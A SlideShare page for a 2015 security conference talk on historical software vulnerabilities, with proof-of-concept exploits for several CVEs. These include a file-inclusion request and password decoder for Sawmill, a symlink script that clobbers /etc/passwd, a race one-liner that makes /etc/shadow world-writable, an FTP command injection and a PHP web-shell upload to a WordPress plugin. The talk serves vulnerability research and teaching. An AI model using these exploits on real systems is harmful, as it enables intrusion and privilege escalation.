SlideShare uma empresa Scribd logo

Fun with Exploits Old and New: Software Behavior and Exploitation

Transferir como PPTX, PDF
Larry Cashdollar
Larry Cashdollar

This document discusses various software exploits, both old and new. It begins with background on the author and terminology used. Several specific past exploits are described in detail, including vulnerabilities in IRIX Midikeys from 1999, Sawmill from 2000, and Solaris catman from 2000. Exploit code examples are provided. More recent exploits discussed include a race condition in Centrify from 2012, command injection in an FTP server from 2013, SQL injection in WordPress software from 2015, and remote file inclusion in another WordPress plugin from 2015. The document concludes by soliciting any questions.

Software
1 de 31
Fun with Exploits Old and New How software is expected to behave, how it really behaves and how we can exploit it Larry W. Cashdollar 11/13/2015 V1.9
Who Am I • 15 years at Akamai Technologies • ​Hobbyist Vulnerability Researcher • ​100+ Vulnerabilities discovered • ​Formerly Unix Systems Administrator 17 years • ​Penetration Tester Back in Late 90s • Enjoy Writing and Breaking Code • This is my second time speaking in public
Terminology • CVE – Common Vulnerabilities and Exposure • Root shell – gaining access to administrative user on Unix system • Web shell – a web based shell used to access the system via HTTP • Vulnerability – A flaw in a piece of software • PoC – Proof of Concept
What is this all about? • Concepts • Methodologies • Mind set • How can I break this? • Think like a hacker
Why bother hacking stuff? • Improves software security • Improves stability • It’s like solving a puzzle • Can be a lot of fun • Improves your skills • And……..
Exploiting a vulnerability you found feels like
Some common Vulnerabilities • LFI (Local File Inclusion) • RFI (Remote File Inclusion) • RCE (Remote Command Execution) • Race Condition • SQL Injection • XSS (Cross Site Scripting) • Command Injection
Concepts • Unchecked User Input • User Input is expected to behave • Abuse Program Flow • Unintended functionality • Abuse software privilege
Examples: Old
IRIX Midikeys: CVE 1999-0765
CVE: 1999-0765 setuid root binary abuse • Binary executes with root privileges • Allows modification of sensitive system files
Exploit CVE-1999-0765 • Open /etc/passwd as a .wav file • Or export WINEDITOR=/usr/X11/bin/xterm
Sawmill LFI & weak encryption CVE- 2000-0589 & 0588 • Log analysis server listens on port 8987 • LFI can read first line of any word readable file • Admin password stored in local file • Admin password encrypted with custom algorithm
Exploiting CVE-2000-0589 & 0588 • $ curl http://192.168.1.65:8987/sawmill?rfcf+%22/etc/sawmill/adminpwd.db%2 2+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 • Returns encrypted password Am@duZw • Simple substitution cypher • Wrote code to decrypt… for my palm pilot IIIxe
PoC for CVE-2000-0589 & 0588 1. #include <stdio.h> 2. 3. char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:"{}|"; 4. char *encode="=GeKMNQS~TfUVWXY[abcygimrs"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z"; 5. 6. int 7. main (int argc, char **argv) 8. { 9. 10. int x, y; 11. char cypher[128]; 12. 13. strncpy (cypher, argv[1], 128); 14. 15. for (x = 0; x < strlen (cypher); x++) { 16. 17. for (y = 0; y < strlen (encode); y++) 18. if (cypher[x] == encode[y]){ 19. printf ("%c", alpha[y]); 20. break; 21. } 22. } 23. 24. printf("n"+" could also be a space [ ]n"); 25. } • Decrypted password was ‘wookie’ • Access to modify administrative control panel • Developer gave me a free license 
Solaris catman file clobbering vulnerability CVE-2000-0095 • Creates files in /tmp insecurely • Uses guessable filenames • Doesn’t check to see if file already exists • Creates files in /tmp as /tmp/sman_PID • We can guess next filename and symlink to /etc/passwd
PoC 1. #!/usr/local/bin/perl -w 2. # http://vapid.dhs.org 3. $clobber = "/etc/passwd"; 4. #file to clobber 5. $X=getpgrp(); 6. $Xc=$X; 7. #Constant 8. $Y=$X+1000; 9. #Constant 10. while($X < $Y) { 11. print "Linking /tmp/sman_$X to $clobber :"; 12. # Change $clobber to what you want to clobber. 13. if (symlink ($clobber, "/tmp/sman_$X")) { 14. print "Sucessn"; 15. } else 16. { 17. print "failed, Busy system?n"; 18. } 19. $X=$X+1; 20. } 21. #Watch /tmp and see if catman is executed in time. 22. while(1) { 23. $list = "/usr/bin/ls -l /tmp | grep sman|grep root |"; 24. open (list,$list) or "die cant open ls...n"; 25. while(<list>) { 26. @args = split "_",$_; 27. chop ($args[1]); 28. if ($args[1] >= $Xc && $args[1] <= $Y) 29. { 30. print "Looks like pid $args[1] is the winnern cleaning....n"; 31. `/usr/bin/rm -f /tmp/sman*`; 32. exit(1); 33. } 34. } 35. }
Exploit Results • /etc/passwd overwritten with contents of sman_pid • System hosed
Exploits: New
Centrify CVE-2012-6348 /tmp race condition local root • Administrative control daemon for system management • Creates a file in /tmp as centrify.cmd.0 • Executes that file as shell script! • Executes as root!
CVE-2012-6348 PoC Wins race condition 50% of the time: $ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done After the system is refreshed via administrative control job: $ ls -l /etc/shadow -rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
CVE-2012-6348 Better PoC • Wins race condition 100% of the time • Written in C • Uses inotify() to detect file modification and creation • Too long to display here
Ftpd ruby gem command injection CVE-2013-2512 • FTP server developed in ruby • Code examination reveals remote command injection 208 def ls(ftp_path, option) 209 path = expand_ftp_path(ftp_path) 210 dirname = File.dirname(path) 211 filename = File.basename(path) 212 command = [ 213 'ls', 214 option, 215 filename, <-- unsanitized user controlled input 216 '2>&1', 217 ].compact.join(' ') 218 if File.exists?(dirname) <- file has to exist to exec ls command 219 list = Dir.chdir(dirname) do 220 `{command}` <-- passed to shell here
CVE-2013-2512 PoC $ ftp localhost Connected to localhost. 220 ftpd Name (localhost:root): anonymous 331 Password required Password: 230 Logged in Remote system type is UNIX. Using binary mode to transfer files. * I already created the filename foobar by uploading a file ftp> ls foobar;id 200 PORT command successful 150 Opening ASCII mode data connection -rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf uid=0(root) gid=0(root) groups=0(root) 226 Transfer complete
wp-powerplaygallery vulnerable SQL injection code CVE 2015-5599 131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."',' ".$_REQUEST['name']."',1,'','NULL')"; 133 : $wpdb->query($query);
Blind SQLi Exploit • Sqlmap $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 – risk 3
wp-powerplaygallery vulnerable RFI Code CVE-2015-5681 50 $targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder'; 51 $cleanupTargetDir = true; // Remove old files 52 $maxFileAge = 5 * 3600; // Temp file age in seconds 53 54 // Create target dir 55 if (!file_exists($targetDir)) { 56 @mkdir($targetDir); 57 } . 148: // Read binary input stream and append it to temp file 149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151: } . 158: while ($buff = fread($in, 4096)) { 159: fwrite($out, $buff); 160: }
RFI Exploit Requirements • POST request • Variable albumid must point at existing album in database • File to upload must exist locally • Use c99 shell as our payload • file variable contains payload with local full path • name variable contains our filename
PoC Exploit 1. <?php 2. $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php'; 3. $file_name_with_full_path = '/var/www/shell.php’; 4. echo "POST to $target_url $file_name_with_full_path"; 5. $post = array('albumid'=>’4' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); 6. $ch = curl_init(); 7. curl_setopt($ch, CURLOPT_URL,$target_url); 8. curl_setopt($ch, CURLOPT_POST,1); 9. curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 10. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 11. $result=curl_exec ($ch); 12. curl_close ($ch); 13. echo "<hr>"; 14. echo $result; 15. echo "<hr>"; 16. ?>
Questions? • larry0@me.com • http://www.vapidlabs.com • Twitter @_larry0

Recomendados

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.Larry Cashdollar
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress PluginsLarry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Mohammad Reza Kamalifard
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 

Recomendados

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.Mining Ruby Gem vulnerabilities for Fun and No Profit.
Mining Ruby Gem vulnerabilities for Fun and No Profit.Larry Cashdollar
 
Hacking Wordpress Plugins
Hacking Wordpress PluginsHacking Wordpress Plugins
Hacking Wordpress PluginsLarry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Mohammad Reza Kamalifard
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-ObfuscationDaniel Bohannon
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec DefenseDaniel Bohannon
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
How to do everything with PowerShell
How to do everything with PowerShellHow to do everything with PowerShell
How to do everything with PowerShellJuan Carlos Gonzalez
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortanaWill Schroeder
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
Ansible tips & tricks
Ansible tips & tricksAnsible tips & tricks
Ansible tips & tricksbcoca
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Jun Hong Kim
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 
Media (24)
Media (24)Media (24)
Media (24)Биляна Бенева
 
Bab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan KomputerBab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan Komputernurmayabadriatulj
 

Mais conteúdo relacionado

Mais procurados

Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
How to do everything with PowerShell
How to do everything with PowerShellHow to do everything with PowerShell
How to do everything with PowerShellJuan Carlos Gonzalez
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
Ansible tips & tricks
Ansible tips & tricksAnsible tips & tricks
Ansible tips & tricksbcoca
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Jun Hong Kim
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Daniel Bohannon
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...DoktorMandrake
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 

Mais procurados (20)

Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec Defense
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
 
How to do everything with PowerShell
How to do everything with PowerShellHow to do everything with PowerShell
How to do everything with PowerShell
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
 
Ansible tips & tricks
Ansible tips & tricksAnsible tips & tricks
Ansible tips & tricks
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 

Destaque

Bab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan KomputerBab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan Komputernurmayabadriatulj
 
Social Selling - An Introduction
Social Selling - An IntroductionSocial Selling - An Introduction
Social Selling - An IntroductionAndrew Moloney
 
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...Daichi Kitamura
 
Self driving cars -
Self driving cars - Self driving cars -
Self driving cars - Hany G. Amer
 

Destaque (10)

Media (24)
Media (24)Media (24)
Media (24)
 
Bab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan KomputerBab 5 Dasar Jaringan Komputer
Bab 5 Dasar Jaringan Komputer
 
Freaks
FreaksFreaks
Freaks
 
Media (4)
Media (4)Media (4)
Media (4)
 
Social Selling - An Introduction
Social Selling - An IntroductionSocial Selling - An Introduction
Social Selling - An Introduction
 
Reebok strategy
Reebok strategyReebok strategy
Reebok strategy
 
Bahan ajar fisika elastisitas
Bahan ajar fisika elastisitasBahan ajar fisika elastisitas
Bahan ajar fisika elastisitas
 
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
統計的独立性と低ランク行列分解理論に基づく ブラインド音源分離 –独立低ランク行列分析– Blind source separation based on...
 
Self driving cars -
Self driving cars - Self driving cars -
Self driving cars -
 
Colgate brand image
Colgate brand imageColgate brand image
Colgate brand image
 

Semelhante a Fun with Exploits Old and New: Software Behavior and Exploitation

24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAsKellyn Pot'Vin-Gorman
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnSandro Zaccarini
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Yuriko IKEDA
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
Efficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line KeystrokesEfficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line KeystrokesSeth Miller
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018Mandi Walls
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopMandi Walls
 
Introduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release updateIntroduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release updateAlex Pop
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Ilya Haykinson
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)ÇözümPARK
 
Virtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetVirtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetOmar Reygaert
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasag20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasaggarrett honeycutt
 

Semelhante a Fun with Exploits Old and New: Software Behavior and Exploitation (20)

24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vuln
 
#WeSpeakLinux Session
#WeSpeakLinux Session#WeSpeakLinux Session
#WeSpeakLinux Session
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with Ansible
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Efficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line KeystrokesEfficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line Keystrokes
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec Workshop
 
Introduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release updateIntroduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release update
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
 
Virtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetVirtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + Puppet
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasag20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasag
 
From P0W3R to SH3LL
From P0W3R to SH3LLFrom P0W3R to SH3LL
From P0W3R to SH3LL
 

Último

英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
SpotFlow: Tracking Method Calls and States at Runtime
